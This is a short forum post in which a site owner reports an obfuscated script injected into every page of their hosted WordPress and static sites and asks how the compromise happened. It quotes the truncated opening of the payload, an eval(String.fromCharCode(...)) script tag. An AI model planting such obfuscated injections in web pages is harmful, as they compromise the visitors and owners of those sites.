Malicious Code

I am getting this code on ALL of my sites on EVERY page

<script>eval(String.fromCharCode(102,117,110,99,116 (numbers repeat for a while </script>

I am with ixwebhosting and have some wordpress sites hosted and also a few static pure html sites. The code appears on every page of every site, I was wondering if the vulnerability is with my wordpress blogs, or with my hosting company or with me? After this happened ixwebhosting deleted all the code, told me to change my ftp password, so I did, then all the code appeared again a few days later, now they tell me I should change the permissions on some folders and add https://ftp.allow and https://ftp.deny files.

Looking for help

…. those numbers repeat for a long time